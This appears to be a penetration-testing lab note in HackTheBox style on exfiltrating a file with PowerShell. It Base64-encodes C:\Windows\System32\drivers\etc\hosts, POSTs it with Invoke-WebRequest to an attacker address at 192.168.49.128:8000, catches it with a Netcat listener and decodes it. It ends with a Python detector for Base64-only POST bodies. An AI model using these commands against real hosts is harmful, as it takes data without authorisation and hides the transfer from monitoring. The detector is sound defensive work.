PowerShell Base64 Web Upload
Here's a slick way to exfiltrate files using PowerShell, Base64, and a simple Netcat listener on your attack box; no need for a fancy web server!
Step 1: Encode the File in PowerShell
We'll convert the file into Base64 so it can be transferred as plain text.
PS C:\htb> $b64 = [System.Convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Step 2: Send It as a POST Request
Now we send that Base64 string to our attacker box using Invoke-WebRequest.
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
Step 3: Catch the Data with Netcat
Set up Netcat on your attack box to listen for incoming POST data:
z3tssu@htb[/htb]$ nc -lvnp 8000
You'll see something like this when the request comes through:
POST / HTTP/1.1
User-Agent: Mozilla/5.0...
Content-Length: 1820
<your base64 string here!>
Step 4: Decode and Rebuild the File
Copy the Base64 string and decode it back into the original file:
z3tssu@htb[/htb]$ echo <base64_string> | base64 -d -w 0 > hosts
Now your hosts file is restored!
Want to verify it? Just run md5sum to compare hashes.
Tip:
This trick is super handy for environments where you don't have an upload endpoint but can exfil data in a stealthy way via HTTP POST.
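From the defender's side, the request shown in Step 3 has a recognizable shape: a POST whose entire body is one Base64 blob. The following is an added example, not part of the original page, that flags such requests in captured HTTP traffic. The function names, the 256-character threshold and the sample requests (including the PowerShell User-Agent string) are constructed assumptions.

```python
import base64
import binascii
import re

B64_ONLY = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MIN_BODY_CHARS = 256  # assumed threshold; tune to your traffic


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line.split(" ", 1)[0].upper(), headers, body.strip()


def base64_upload_findings(raw):
    """Return the reasons a request resembles the Base64 POST upload above."""
    method, headers, body = parse_request(raw)
    if method != "POST" or len(body) < MIN_BODY_CHARS:
        return []
    if not B64_ONLY.fullmatch(body):
        return []  # form fields, JSON, multipart, etc. fail here
    try:
        decoded = base64.b64decode(body, validate=True)
    except (binascii.Error, ValueError):
        return []  # right alphabet, but not a valid Base64 stream
    findings = [f"POST body is a single Base64 blob ({len(decoded)} bytes decoded)"]
    if "powershell" in headers.get("user-agent", "").lower():
        findings.append("User-Agent identifies PowerShell")
    return findings


def build_request(method, user_agent, body):
    """Assemble a constructed sample request for the demo below."""
    return (f"{method} / HTTP/1.1\r\nUser-Agent: {user_agent}\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


# Constructed samples: stand-in file content and User-Agent strings.
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
BLOB = base64.b64encode(b"127.0.0.1 localhost\r\n" * 20).decode()
SUSPECT = build_request("POST", PS_UA, BLOB)
BENIGN = build_request("POST", "Mozilla/5.0 (X11; Linux x86_64)", "user=alice&note=" + "hello " * 60)

if __name__ == "__main__":
    for name, req in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, base64_upload_findings(req))
```

The User-Agent check only helps when the client leaves the default header in place, so treat the Base64-only body as the primary signal and the header as corroboration.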